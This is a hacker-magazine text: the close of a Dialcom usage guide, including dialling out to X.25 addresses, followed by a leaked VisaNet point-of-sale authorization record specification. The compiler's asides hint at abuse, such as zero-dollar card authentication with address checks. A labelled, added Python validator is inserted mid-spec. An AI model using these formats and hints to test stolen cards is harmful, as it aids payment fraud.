FILING MESSAGES: Messages are filed in two cases. First, the user can file any message into any directory, and second, the system files read messages that lie in the mailbox for over 30 days. Received messages are filed by entering "FILE" at the "Disposition:" prompt. This files the message into a miscellaneous category called BOX. If an optional is added after "FILE", the message will be filed into that category. If doesn't exist, MAIL can create it for you. After a message has been filed, it's not removed from the mailbox -- that's up to the user to do. Sent messages behave the same way, but the command is ".FILE" from the "Text:" prompt.

To display categories of filed mail, enter DIS FILES at a prompt. To read or scan messages in filed, just add "FILE after the command (READ, SCAN, etc). To delete a category, enter D FILE . To delete a single message in a category, just use D as you would on any other message, after you read it from the MAIL.FILE.

Connecting via Dialcom
~~~~~~~~~~~~~~~~~~~~~

Dialcom allows its customers to access other systems through it. There are some services offered specifically through Dialcom, such as the BRS/MENUS service, which is an electronic library with databases about many subjects, Telebase's Cyclopean Gateway Service, which offers access to many online database services (like Newsnet, Dialog and even BRS) and more.
These services have a direct connection to Dialcom and software that maps Dialcom user ids to their own ids (it's not usually possible for someone to access one of these services without first connecting to Dialcom).

Another method is general connection to X.25 addresses. Since Dialcom is connected to X.25, and it allows users to use the Prime NETLINK commands, it's possible to PAD out of Dialcom!!#!

NETLINK is invoked by entering NETLINK. NETLINK then displays its own '@' prompt. The commands available there are QUIT, to quit back to the OS; CONTINUE, to return to an open connection; CALL, to call an address; and D, to disconnect an open connection.

CALL takes addresses in several formats. A system name, to connect to a Dialcom system, or an address in the format of DNIC:NUA. For example,

    @ CALL :666
    Circuit #1
    666 Connected
    [...]
    @ CALL 3110:21300023
    Circuit #2
    21300023 Connected
    [...]

NETLINK establishes connections in the form of circuits. A circuit can be broken out of into command mode (the '@' prompt), using "@", and another can be opened, or parameters can be changed, etc. NETLINK has other commands, to log connections into a file, or set PAD parameters (SET, PAR), or turn on connection debugging, or change the default '@' prompt, and more.

Things to Do on Dialcom
~~~~~~~~~~~~~~~~~~~~~~

Much of what Dialcom offers was not covered until now and will not be covered. That's because most of the services could use a file each, and because many account groups have things enabled or disabled just for them. Instead, I will write shortly about two of the more interesting things online, the news service and clipping service, and add pointers to some interesting commands to try out.

The news service, accessed with the NEWS command, is a database of newswires from AP, Business Wire, UPI, Reuters and PR Newswire. The user enters the database, and can search for news by keywords.

After entering NEWS, you will see a menu of all the news agencies.
Once you choose an agency, you will enter its menu, which sometimes contains
a copyright warning and terms of usage and also the list of news categories
available from that agency (National, North America, Business, Sports, etc).
Once you choose the category, you will be asked for the keyword to search
for. If a story (or several stories) was found containing your desired
keyword, you can read through the stories in the order of time, or the order
they appear, or reverse order and so on, and finally mail a story to
yourself, or enter new search keywords, or jump to another story, or simply
quit.

The news clipping service, available with the command NEWSTAB, allows the
user to define keyword-based rules for selecting news clippings. The system
then checks every newswire that passes through it, and if it matches the
rules, mails the newswire to the user.

After entering NEWSTAB, you are presented with a menu that allows you to
show, add, delete, and alter your rules for choosing news. The rules are made
using words or phrases, logical operators, wildcards and minimal punctuation.
A rule can be as simple as "HACKING", which will get every newswire with the
word "hacking" in it mailed to you, or if you want to be more selective,
"NASA HACKING". Logical operators are either AND or OR. For example,
"HACKING AND INTERNET". Wildcards are either '*' or '?' (both function the
same). They simply replace any number of letters. Punctuation is permitted
for initials, abbreviations, apostrophes or hyphens, but not for question
marks and similar. All of this is explained in the NEWSTAB service itself.

For the file hungry, Dialcom offers several file transfer programs, including
KERMIT and Dialcom's FT, which implements most popular protocols, like
Zmodem, Xmodem, etc.

A small number of other fun things to try:

NET-TALK  The ``interactive computer conferencing system'' -- build your
          private IRC!

CRYPTO    Dialcom's encryption program.
          Something they're probably going to love on sci.crypt.

NUSAGE    By far one of the better things to do on Dialcom, it was left out
          of this file because it is simply huge. This program allows the
          user (typically an administrator) to monitor network usage, sort
          the data, store it, peek into all the little details (virtual
          connection types, remote/local addresses, actions, time, commands,
          etc). Unfortunately, it's completely beyond the scope of this
          file, as there are tons of switches and options to use in order to
          put this program to effective use.

                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 15 of 28

****************************************************************************

visanetoperations; part1

obtainedandcompiled by icejey /\ lowerfeldafederationforundercasing
iiu delamolabz chuchofthenoncomformist && theilluminatibarbershopquartet

greetz2; drdelam maldoror greenparadox kaleidox primalscream reddeath kerryk

-------------------------- [ typed in true(c) 80 columns] ----------------------
---------------------------- [ comments appear in []s ] ------------------------

[ section one ]
[ from the word of god ]

(VISA logo in ASCII art)

EXTERNAL INTERFACE SPECIFICATION
--------------------------------
SECOND GENERATION AUTHORIZATION RECORD FORMATS

For Record Formats
--------------------------
J - PS/2000 REPS
G - VisaNet Dial Debit

1.0  INTRODUCTION
2.0  APPLICABLE DOCUMENTS
     2.01  RELATED VISA DOCUMENTS FOR AUTHORIZATION
     2.02  RELATED VISA DOCUMENTS FOR DATA CAPTURE
3.0  AUTHORIZATION RECORD FORMATS
     3.01  REQUEST RECORD FORMAT
     3.02  RESPONSE RECORD FORMAT
4.0  REQUEST RECORD DATA ELEMENT DEFINITIONS
     4.01  RECORD FORMAT
     4.02  APPLICATION TYPE
     4.03  MESSAGE DELIMITER
     4.04  ACQUIRER BIN
     4.05  MERCHANT NUMBER
     4.06  STORE NUMBER
     4.07  TERMINAL NUMBER
     4.08  MERCHANT CATEGORY CODE
     4.09  MERCHANT COUNTRY CODE
     4.10  MERCHANT CITY CODE
     4.11  TIME ZONE DIFFERENTIAL
     4.12  AUTHORIZATION TRANSACTION CODE
     4.13  TERMINAL IDENTIFICATION NUMBER
     4.14  PAYMENT SERVICE INDICATOR
     4.15  TRANSACTION SEQUENCE NUMBER
     4.16  CARDHOLDER IDENTIFICATION DATA
     4.17  ACCOUNT DATA SOURCE
     4.18  CUSTOMER DATA FIELD
           4.18.1  TRACK 1 READ DATA
           4.18.2  TRACK 2 READ DATA
           4.18.3  MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
                   4.18.3.1  MANUALLY ENTERED ACCOUNT NUMBER
                   4.18.3.2  MANUALLY ENTERED EXPIRATION DATE
           4.18.4  CHECK ACCEPTANCE IDENTIFICATION NUMBER
                   4.18.4.1  CHECK ACCEPTANCE ID
                   4.18.4.2  MANUALLY ENTERED CHECK ACCEPTANCE DATA
     4.19  FIELD SEPARATOR
     4.20  CARDHOLDER IDENTIFICATION DATA
           4.20.1  STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
           4.20.2  STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
           4.20.3  DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
           4.20.4  ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm...]
     4.21  FIELD SEPARATOR
     4.22  TRANSACTION AMOUNT
     4.23  FIELD SEPARATOR
     4.24  DEVICE CODE/INDUSTRY CODE
     4.25  FIELD SEPARATOR
     4.26  ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
     4.27  FIELD SEPARATOR
     4.28  SECONDARY AMOUNT (CASHBACK)
     4.29  FIELD SEPARATOR
     4.30  MERCHANT NAME
     4.31  MERCHANT CITY
     4.32  MERCHANT STATE
     4.33  SHARING GROUP
     4.34  FIELD SEPARATOR
     4.35  MERCHANT ABA NUMBER
     4.36  MERCHANT SETTLEMENT AGENT NUMBER
     4.37  FIELD SEPARATOR
     4.38  AGENT NUMBER
     4.39  CHAIN NUMBER
     4.40  BATCH NUMBER
     4.41  REIMBURSEMENT ATTRIBUTE
     4.42  FIELD SEPARATOR
     4.43  APPROVAL CODE
     4.44  SETTLEMENT DATE
     4.45  LOCAL TRANSACTION DATE
     4.46  LOCAL TRANSACTION TIME
     4.47  SYSTEM TRACE AUDIT NUMBER
     4.48  ORIGINAL AUTHORIZATION TRANSACTION CODE
     4.49  NETWORK IDENTIFICATION CODE
     4.50  FIELD SEPARATOR
5.0  RESPONSE RECORD DATA ELEMENT DEFINITIONS
     5.01  PAYMENT SERVICE INDICATOR
     5.02  STORE NUMBER
     5.03  TERMINAL NUMBER
     5.04  AUTHORIZATION SOURCE CODE
     5.05  TRANSACTION SEQUENCE NUMBER
     5.06  RESPONSE CODE
     5.07  APPROVAL CODE
     5.08  LOCAL TRANSACTION DATE
     5.09  AUTHORIZATION RESPONSE CODE
     5.10  AVS RESULT CODE
     5.11  TRANSACTION IDENTIFIER
     5.12  FIELD SEPARATOR
     5.13  VALIDATION CODE
     5.14  FIELD SEPARATOR
     5.15  NETWORK IDENTIFICATION CODE
     5.16  SETTLEMENT DATE
     5.17  SYSTEM TRACE AUDIT NUMBER
     5.18  RETRIEVAL REFERENCE NUMBER
     5.19  LOCAL TRANSACTION TIME
6.0  CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
     6.01  NETWORK IDENTIFICATION CODE
     6.02  SETTLEMENT DATE
     6.03  SYSTEM TRACE AUDIT NUMBER
7.0  CHARACTER CODE DEFINITIONS
     7.01  TRACK 1 CHARACTER DEFINITION
     7.02  TRACK 2 CHARACTER DEFINITION
     7.03  AUTHORIZATION MESSAGE CHARACTER SET
     7.04  CHARACTER CONVERSION SUMMARY
     7.05  ACCOUNT DATA LUHN CHECK
     7.06  CALCULATING AN LRC
     7.07  TEST DATA FOR RECORD FORMAT "J"
           7.07.1  TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
           7.07.2  RESPONSE MESSAGE FOR TEST DATA

-------------------------------------------------------------------------------

1.0  INTRODUCTION

This document describes the request and response record formats for the
VisaNet second generation Point-Of-Sale (POS)
authorization terminals and VisaNet Authorization services. This document
describes only record formats. Other documents describe communication
protocols and POS equipment processing requirements. Figure 1.0 represents
the authorization request which is transmitted to VisaNet using public
communication services and the authorization response returned by VisaNet.
Debit transactions include a third confirmation message.

      POS DEVICE                                     VISANET
      ----------                                     -------

 AUTHORIZATION REQUEST    |
 TRANSMITTED TO A         |---------->
 VISANET AUTHORIZATION    |
 HOST SYSTEM              |
                                        |  AUTHORIZATION RESPONSE
                                        |  RETURNED BY THE
                          <-------------|  VISANET HOST TO
                                        |  THE POS TERMINAL

 DEBIT RESPONSE
 CONFIRMATION ------------------------->   TRANSMITTED TO HOST SYSTEM

          FIGURE 1.0  Authorization request and response.

This document describes the record formats to be used for the development of
new applications. Current formats or transition formats will be provided on
request. The usage of some fields has changed with the new record formats.
Applications which were developed to previous specifications will continue to
be supported by VisaNet services. The new formats and field usage are
provided with the intention of moving all new applications developed to the
new formats.

2.0  APPLICABLE DOCUMENTS

The following documents provide additional definitions and background.

2.01  RELATED VISA DOCUMENTS FOR AUTHORIZATION

      1. EIS1051 - External Interface Specification
                   Second Generation
                   Authorization Link Level Protocol

2.02  RELATED VISA DOCUMENTS FOR DATA CAPTURE

      1. EIS1081 - External Interface Specification
                   Second Generation
                   Data Capture Record Formats

      2. EIS1052 - External Interface Specification
                   Second Generation
                   Data Capture Link Level Protocol

3.0  AUTHORIZATION RECORD FORMATS

This section contains the record formats for the authorization request,
response and confirmation records. The ANSI X3.4 character set is used to
represent all record data elements.
(See Section 7)

In the record formats on the following pages, the column heading FORMAT is
defined as:

   "NUM"  represents numeric data, the numbers 0 through 9, NO SPACES.
   "A/N"  represents alphanumeric data, the printing character set.
   "FS"   represents a field separator character as defined in ANSI X3.4 as
          a "1C" hex

3.01  REQUEST RECORD FORMAT

Table 3.01b provides the record format for the authorization request records.
Section 4 provides the data element definitions.

The authorization request record is a variable length record. The record
length will depend on the source of the customer data and the type of
authorization request. Refer to Table 3.01c to determine which GROUPS to use
from Table 3.01a

TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY. ALL NEW APPLICATIONS
SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS:

RECORD | APPLICATION |
FORMAT | TYPE        | REMARKS
-------------------------------------------------------------------------------
   J   | CREDIT      | All non-ATM card transactions (Visa cards, other credit
       |             | cards, private label credit cards and check guarantee)
   G   | DIAL DEBIT  | Visa supported ATM debit cards

The selection of format type J and G or any other value from Table 3.01a will
depend on the VisaNet services that are desired. Contact your Visa POS member
support representative for assistance in determining the required formats.
TABLE 3.01a
Record Format Summary

Non-CVV Compliant /   Terminal
CVV Compliant         Generation   Description
-------------------------------------------------------------------------------
0                                  RESERVED
1  N                  First        Vutran
2  8                  First        Sweda
4  R                  First        Verifone
6  P                  First        Amex
7  3                  First        Racal
A  Q                  First        DMC
B  R                  First        GTE & Omron [velly intelestink]
C  9                  First        Taltek
S  U                  First        Datatrol - Standard Oil
D  T                  First        Datatrol
E                                  RESERVED
5  F                  Second       Non-REPS-Phase 1 CVV
G                     Second       Dial Debit
H                     Second       Non-REPS-Phase 2 CVV
I                     Second       RESERVED - Non-REPS Controller
J                     Second       REPS - Terminal & Controller
K                     Second       RESERVED
L                     Second       RESERVED - Leased VAP
M                     Second       RESERVED - Member Format
N-O                                RESERVED
V-Y                                RESERVED
Z                     Second       RESERVED - SDLC Direct [hmmm]
-------------------------------------------------------------------------------

TABLE 3.01b
Second Generation Authorization Request Record Format

                                                                       see
Group  Byte#     Length  Format  Name                                  section
-------------------------------------------------------------------------------
       1         1       A/N     Record Format                         4.01
       2         1       A/N     Application Type                      4.02
       3         1       A/N     Message Delimiter                     4.03
       4-9       6       NUM     Acquirer Bin                          4.04
       10-21     12      NUM     Merchant Number                       4.05
       22-25     4       NUM     Store Number                          4.06
       26-29     4       NUM     Terminal Number                       4.07
       30-33     4       NUM     Merchant Category Code                4.08
       34-36     3       NUM     Merchant Country Code                 4.09
       37-41     5       A/N     Merchant City Code (ZIP in the U.S.)  4.10
       42-44     3       NUM     Time Zone Differential                4.11
       45-46     2       A/N     Authorization Transaction Code        4.12
       47-54     8       NUM     Terminal Identification Number        4.13
       55        1       A/N     Payment Service Indicator             4.14
       56-59     4       NUM     Transaction Sequence Number           4.15
       60        1       A/N     Cardholder Identification Code        4.16
       61        1       A/N     Account Data Field                    4.17
       Variable  1-76            Customer Data Field                   4.18.x
                                 (See: DEFINITIONS in Table 3.01d)
       Variable  1       "FS"    Field Separator                       4.19
       Variable  0-32    A/N     Cardholder Identification Data        4.20
       Variable  1       "FS"    Field Separator                       4.21
       Variable  3-12    NUM     Transaction Amount                    4.22
       Variable  1       "FS"    Field Separator                       4.23
       Variable  2       A/N     Device Code/Industry Code             4.24
       Variable  1       "FS"    Field Separator                       4.25
       Variable  0-6     NUM     Issuing/Receiving Institution ID      4.26
I      Variable  1       "FS"    Field Separator                       4.27
       Variable  3-12    NUM     Secondary Amount (Cashback)           4.28
II     Variable  1       "FS"    Field Separator                       4.29
       Variable  25      A/N     Merchant Name                         4.30
       Variable  13      A/N     Merchant City                         4.31
       Variable  2       A/N     Merchant State                        4.33
       Variable  1-14    A/N     Sharing Group                         4.33
       Variable  1       "FS"    Field Separator                       4.34
       Variable  0-12    NUM     Merchant ABA                          4.35
       Variable  0-4     NUM     Merchant Settlement Agent Number      4.36
       Variable  1       "FS"    Field Separator                       4.37
       Variable  6       NUM     Agent Number                          4.38
       Variable  6       NUM     Chain Number                          4.39
       Variable  3       NUM     Batch Number                          4.40
       Variable  1       A/N     Reimbursement Attribute               4.41
III    Variable  1       "FS"    Field Separator                       4.42
       Variable  6       A/N     Approval Code                         4.43
       Variable  4       NUM     Settlement Date (MMDD)                4.44
       Variable  4       NUM     Local Transaction Date (MMDD)         4.45
       Variable  6       NUM     Local Transaction Time (HHMMSS)       4.46
       Variable  6       A/N     System Trace Audit Number             4.47
       Variable  2       A/N     Original Auth. Transaction Code       4.48
       Variable  1       A/N     Network Identification Code           4.49
IV     Variable  1       "FS"    Field Separator                       4.50

NOTE: The maximum length request can be as long as 290 bytes for an Interlink
Debit Cancel request (including the STX/ETX/LRC).
Since some terminals may be limited to a 256 byte message buffer, the
following tips can save up to 36 bytes:

   - Limit fields 4.22 and 4.28 to 7 digits
   - Fields 4.26, 4.35 and 4.36 are not required for a debit request
   - Field 4.33 can be limited to 10 bytes

TABLE 3.01C
Legend for GROUP (from Table 3.01b)

FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS     RECORD
                                                        I II III IV     FORMAT

Check guarantee                                            X              J

Non-ATM card transactions (Visa cards, other               X X            J
credit cards, private label credit cards

Visa supported ATM debit cards: Purchase, Return           X X X          G
and Inquiry Request

Visa supported ATM debit cards: Interlink Cancel           X X X X        G
Request

TABLE 3.01d
Definitions for Customer Data Field (from Table 3.01b)

Length     Format  Field Name                                See Section

MAGNETICALLY read credit cards (SELECT ONE):
up to 76   A/N     Track 1 Read Data                         4.18.1
up to 37   NUM     Track 2 Read Data                         4.18.2

MANUALLY entered credit cards:
up to 28   NUM     Manually Entered Account Number           4.18.3.1
1          "FS"    Field Separator
4          NUM     Manually Entered Expiration Date (MMYY)   4.18.3.2

MACHINE read and MANUALLY entered check acceptance requests:
1 to 28    A/N     Check Acceptance ID                       4.18.4.1
1          "FS"    Field Separator                           4.18.4.2
3 to 6     A/N     Manually Entered Check Acceptance Data    4.18.4.2

MAGNETICALLY read ATM debit cards:
up to 37   NUM     Track 2 Read Data                         4.18.2

3.02  RESPONSE RECORD FORMAT

Table 3.02a provides the record format for the authorization response
records. Section 5 provides the data element definitions.

The authorization response record is variable length for record formats "J" &
"G". Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a.
Table 3.02a
Second Generation Authorization Response Record

                                                                       see
Group  Byte#     Length  Format  Name                                  section
--------------------------------------------------------------------------------
       1         1       A/N     Payment Service Indicator             5.01
       2-5       4       NUM     Store Number                          5.02
       6-9       4       NUM     Terminal Number                       5.03
       10        1       A/N     Authorization Source Code             5.04
       11-14     4       NUM     Transaction Sequence Number           5.05
       15-16     2       A/N     Response Code                         5.06
       17-22     6       A/N     Approval Code                         5.07
       23-28     6       NUM     Local Transaction Date (MMDDYY)       5.08
       29-44     16      A/N     Authorization Response Message        5.09
       45        1       A/N     AVS Result Code                       5.10
       Variable  0/15    NUM     Transaction Identifier                5.11
       Variable  1       "FS"    Field Separator                       5.12
       Variable  0/4     A/N     Validation Code                       5.13
I      Variable  1       "FS"    Field Separator                       5.14
       Variable  1       A/N     Network Identification Code           5.15
       Variable  4       NUM     Settlement Date (MMDD)                5.16
       Variable  6       A/N     System Trace Audit Number             5.17
       Variable  12      A/N     Retrieval Reference Number            5.18
II     Variable  6       NUM     Local Transaction Time (HHMMSS)       5.19

Table 3.02b
Legend for GROUP (from Table 3.02a)

FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS     RECORD
                                                              I II      FORMAT

All non-ATM card transactions (Visa cards, other credit       X           J
cards, private label credit cards and check guarantee)

Visa supported ATM debit cards: Purchase, Return, Inquiry     X X         G
Request and Interlink Cancel Request

3.03  CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY)

Table 3.03 provides the record format for the second generation debit
response confirmation record. Section 6 provides the data element
definitions.

The debit response confirmation record is a fixed length record.

TABLE 3.03
Second Generation Debit Response Confirmation Record

                                                                       see
Group  Byte#     Length  Format  Name                                  section
--------------------------------------------------------------------------------
       1         1       A/N     Network ID Code                       6.01
       2-5       4       NUM     Settlement Date (MMDD)                6.02
I      6-11      6       A/N     System Trace Audit Number             6.03

4.0  REQUEST RECORD DATA ELEMENT DEFINITIONS

The following subsections will define the authorization request record data
elements.
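
The layout in Table 3.01b can be enforced mechanically on the receiving side.
The Python below is an added example, not part of the Visa specification or
of the original file: it parses the 61-byte fixed header and the fields up to
4.24, applying the rules stated in sections 4.03, 4.05-4.07, 4.11, 4.13 and
Tables 3.01d, 4.17 and 4.20. The function names, the RecordError class and
the sample record are assumptions made up for illustration.

```python
FS = "\x1c"  # "FS" field separator, hex 1C in ANSI X3.4

# Bytes 1-61 of the request record (Table 3.01b): (name, length, format).
HEADER = [
    ("record_format", 1, "A/N"), ("application_type", 1, "A/N"),
    ("message_delimiter", 1, "A/N"), ("acquirer_bin", 6, "NUM"),
    ("merchant_number", 12, "NUM"), ("store_number", 4, "NUM"),
    ("terminal_number", 4, "NUM"), ("merchant_category_code", 4, "NUM"),
    ("merchant_country_code", 3, "NUM"), ("merchant_city_code", 5, "A/N"),
    ("time_zone_differential", 3, "NUM"), ("transaction_code", 2, "A/N"),
    ("terminal_id", 8, "NUM"), ("payment_service_indicator", 1, "A/N"),
    ("transaction_sequence", 4, "NUM"), ("cardholder_id_code", 1, "A/N"),
    ("account_data_source", 1, "A/N"),
]
HEADER_LEN = sum(length for _, length, _ in HEADER)  # 61 bytes
NONZERO = ("merchant_number", "store_number", "terminal_number", "terminal_id")
MANUAL_SOURCES = {"T", "X", "@"}  # Table 4.17: manually keyed account data
# Table 4.20: (min, max) cardholder ID data length per cardholder ID code.
CID_LENGTH = {"@": (0, 0), "C": (0, 0), "D": (0, 0), "E": (0, 0), "Z": (0, 0),
              "A": (23, 23), "B": (32, 32), "K": (32, 32), "S": (32, 32),
              "N": (0, 29)}


class RecordError(ValueError):
    """A record violates the layout or one of the field rules."""


def check(name, value, fmt, lo, hi):
    """Enforce the length bounds and the NUM or A/N character class."""
    if not lo <= len(value) <= hi:
        raise RecordError(f"{name}: length {len(value)} outside {lo}-{hi}")
    if fmt == "NUM" and not all(c in "0123456789" for c in value):
        raise RecordError(f"{name}: NUM field holds a non-digit")
    if fmt == "A/N" and not all(" " <= c <= "~" for c in value):
        raise RecordError(f"{name}: A/N field holds a non-printing character")
    return value


def decode_time_zone(code):
    """Table 4.11: return (offset from GMT in minutes, daylight-savings flag)."""
    direction, magnitude = int(code[0]), int(code[1:])
    if direction > 5:
        raise RecordError("time zone differential: direction 6-9 is invalid")
    unit, limit = (60, 12) if direction < 2 else (15, 48)
    if magnitude > limit:
        raise RecordError("time zone differential: magnitude out of range")
    sign = 1 if direction % 2 == 0 else -1
    return sign * magnitude * unit, direction >= 4


def parse_request(record):
    """Parse and validate one request record (STX/ETX/LRC framing removed)."""
    if len(record) <= HEADER_LEN:
        raise RecordError("record shorter than the fixed header")
    f, pos = {}, 0
    for name, length, fmt in HEADER:
        f[name] = check(name, record[pos:pos + length], fmt, length, length)
        pos += length
    if f["record_format"] not in ("J", "G"):
        raise RecordError("record format is not J or G")
    if f["message_delimiter"] != ".":
        raise RecordError("message delimiter is not '.'")
    for name in NONZERO:
        if int(f[name]) == 0:
            raise RecordError(f"{name}: must be non-zero")
    tz = f["time_zone_differential"]
    f["utc_offset_minutes"], f["dst"] = decode_time_zone(tz)
    if f["cardholder_id_code"] not in CID_LENGTH:
        raise RecordError("cardholder identification code is reserved")
    parts = record[pos:].split(FS)
    # Manually keyed card data and check acceptance data (Table 3.01d) carry
    # their own FS inside the customer data field, so they span two pieces.
    manual = f["account_data_source"] in MANUAL_SOURCES
    n = 2 if manual or f["transaction_code"] == "70" else 1
    if len(parts) < n + 3:
        raise RecordError("missing field separator")
    f["customer_data"] = [check("customer_data", p, "A/N", 1, 76)
                          for p in parts[:n]]
    lo, hi = CID_LENGTH[f["cardholder_id_code"]]
    f["cardholder_id_data"] = check("cardholder_id_data", parts[n], "A/N", lo, hi)
    f["transaction_amount"] = check("transaction_amount", parts[n + 1], "NUM", 3, 12)
    f["device_code"] = check("device_code", parts[n + 2], "A/N", 2, 2)
    f["group_fields"] = parts[n + 3:]  # Groups I-IV, left unparsed here
    return f


# Constructed sample: every value is made up (test account number, "XX" code).
SAMPLE = ("J0." "999999" "000000000123" "0001" "0002" "5999" "840" "94105"
          "108" "54" "00000042" "N" "0007" "@" "@"
          + "4111111111111111" + FS + "1295" + FS + FS + "0001500" + FS
          + "XX" + FS)

if __name__ == "__main__":
    print(parse_request(SAMPLE))
```

A record that fails any check raises RecordError before any field is used,
which is the behaviour a host wants when a terminal sends a malformed or
truncated message.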
4.01  RECORD FORMAT

There are several message formats defined within the VisaNet systems. The
second generation authorization format is specified by placing one of the
defined values in the record format field. Table 4.01 provides a brief
summary of the current formats.

TABLE 4.01
VisaNet Authorization Record Format Designators

RECORD
FORMAT   RECORD DESCRIPTION
--------------------------------------------------------------------------------
J        All non-ATM card transactions (Visa cards, other credit cards,
         private label credit cards and check guarantee)
G        Visa supported ATM debit cards

4.02  APPLICATION TYPE

The VisaNet authorization system supports multiple application types ranging
from single thread first generation authorization to interleaved leased line
authorization processing. Table 4.02 provides a summary of application type.

TABLE 4.02
VisaNet Application Designators

APPLICATION                                                      USE WITH
TYPE         APPLICATION DESCRIPTION                             REC. FMT.
--------------------------------------------------------------------------------
0            Single authorization per connection                 J and G
2            Multiple authorizations per connection              J and G
             single-threaded
4            Multiple authorizations per connect,                J
             interleaved
6            Reserved for future use                             ---
8            Reserved for future use                             ---
1,3,5,7      Reserved for VisaNet Central Data Capture (CDC)     ---
9            Reserved for VisaNet Down Line Load                 ---
A-Z          Reserved for future use                             ---

4.03  MESSAGE DELIMITER

The message delimiter separates the format and application type designators
from the body of the message. The message delimiter is defined as a "."
(period)

4.04  ACQUIRER BIN

This field contains the Visa assigned six-digit Bank Identification Number
(BIN). The acquirer BIN identifies the merchant signing member that signed
the merchant using the terminal.

NOTE: The merchant receives this number from their signing member.
4.05  MERCHANT NUMBER

This field contains a NON-ZERO twelve digit number, assigned by the signing
member and/or the merchant, to identify the merchant within the member
systems. The combined Acquirer BIN and Merchant Number are required to
identify the merchant within the VisaNet systems.

4.06  STORE NUMBER

This field contains a NON-ZERO four-digit number assigned by the signing
member and/or the merchant to identify the merchant store within the member
systems. The combined Acquirer BIN, Merchant Number, and Store Number are
required to identify the store within the VisaNet systems.

4.07  TERMINAL NUMBER

This field contains a NON-ZERO four-digit number assigned by the signing
member and/or the merchant to identify the merchant store within the member
systems. This field can be used by systems which use controllers and/or
concentrators to identify the devices attached to the controllers and/or
concentrators.

4.08  MERCHANT CATEGORY CODE

This field contains a four-digit number assigned by the signing member from a
list of category codes defined in the VisaNet Merchant Data Standards
Handbook to identify the merchant type.

4.09  MERCHANT COUNTRY CODE

This field contains a three-digit number assigned by the signing member from
a list of country codes defined in the VisaNet V.I.P. System Message Format
Manuals to identify the merchant location country.

4.10  MERCHANT CITY CODE

This field contains a five character code used to further identify the
merchant location. Within the United States, the five high order zip code
digits of the address of the store location are used. Outside of the United
States, this field will be assigned by the signing member.

4.11  TIME ZONE DIFFERENTIAL

This field contains a three-digit code used to calculate the local time
within the VisaNet authorization system. It is calculated by the signing
member, providing the local time zone differential from Greenwich Mean Time
(GMT). The first two digits specify the magnitude of the differential.
Table 4.11 provides a brief summary of the Time Zone Differential codes.

TABLE 4.11
Time Zone Differential Code Format

Byte #  Length  Format   Contents
--------------------------------------------------------------------------------
1       1       NUMERIC  DIRECTION
                         0 = Positive, Local Ahead of GMT, offset in hours
                         1 = Negative, Local Time behind GMT, offset in hours
                         2 = Positive, offset in 15 minute increments
                         3 = Negative, offset in 15 minute increments
                         4 = Positive, offset in 15 minute increments,
                             participating in daylight savings time
                         5 = Negative, offset in 15 minute increments,
                             participating in daylight savings time
                         6-9 = INVALID CODES
2-3     2       NUMERIC  MAGNITUDE
                         For Byte #1 = 0 or 1
                            0 <= MAGNITUDE <= 12
                         For Byte #1 = 2 through 5
                            0 <= MAGNITUDE <= 48
--------------------------------------------------------------------------------

A code of 108 indicates the local Pacific Standard time which is 8 hours
behind GMT.

4.12  AUTHORIZATION TRANSACTION CODE

This field contains a two-character code defined by VisaNet and generated by
the terminal identifying the type of transaction for which the authorization
is requested. Table 4.12 provides a summary of the transaction codes.

TABLE 4.12
Authorization Transaction Codes

TRAN
CODE   TRANSACTION DESCRIPTION
-------------------------------------------------------------------------------
54     Purchase
55     Cash Advance
56     Mail/Telephone Order
57     Quasi Cash
58     Card Authentication - Transaction Amt & Secondary Amt must equal
       $0.00, AVS may be requested [ah-hah!]
64     Repeat: Purchase
65     Repeat: Cash Advance
66     Repeat: Mail/Telephone Order (MO/TO)
67     Repeat: Quasi Cash
68     Repeat: Card Authentication - Transaction Amt & Secondary Amt must
       equal $0.00, AVS may be requested
70     Check guarantee, must include RIID (field 4.26)
81     Proprietary Card
84     Private Label Purchase
85     Private Label, Cash Advance
86     Private Label Mail/Telephone Order (MO/TO)
87     Private Label Quasi Cash
88     Private Label Card Authentication - Transaction Amt & Secondary Amt
       must equal $0.00, AVS may be requested
93     Debit Purchase
94     Debit Return
95     Interlink Debit Cancel (see NOTE below)
--------------------------------------------------------------------------------

NOTE (for TRANSACTION CODE = 95)
--------------------------------

- For Interlink Debit CANCEL request message, all of the fields in Groups I
  and II will come from the original transaction request or the original
  transaction response, with the exception of the following:

  - The AUTHORIZATION TRANSACTION CODE will need to be changed to the Debit
    CANCEL code.
  - The TRANSACTION SEQUENCE NUMBER should be incremented in the normal
    fashion.
  - The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATA (PIN) will
    need to be re-entered.

4.13  TERMINAL IDENTIFICATION NUMBER

This field contains an eight-digit code that must be greater than zero,
defined by the terminal down line load support organization. Support may be
provided by Visa's Merchant Assistance Center (MAC), the signing member, or a
third party organization.

The terminal ID is used to uniquely identify the terminal in the terminal
support system and identification for the VisaNet Central Data Capture (CDC).
The terminal ID may not be unique within the VisaNet system. Each terminal
support provider and member that provides its own terminal support can assign
potentially identical terminal IDs within its system.
The terminal ID can be used by the terminal down line load system to access
the terminal application and parameter data from a system data base when down
line loading a terminal. [huh?]

NOTE: It is recommended that [the] Terminal ID Number should be unique within
the same Acquirer's BIN.

4.14  PAYMENT SERVICE INDICATOR

This is a one-character field used to indicate a request for REPS
qualification. Table 4.14 provides a summary of the codes.

TABLE 4.14
Payment Service Indicator Codes

RECORD
FORMAT   VALUE   DESCRIPTION
------------------------------
J        Y       Yes
J        N       No
G        Y       Yes
G        N       No
------------------------------
[repetitive? you bet]

4.15  TRANSACTION SEQUENCE NUMBER

This field contains a four-digit code which is generated by the terminal as
the sequence number for the transaction. The sequence number is used by the
terminal to match request and response messages. This field is returned by
VisaNet without sequence verification. The sequence number is incremented
with wrap from 9999 to 0001.

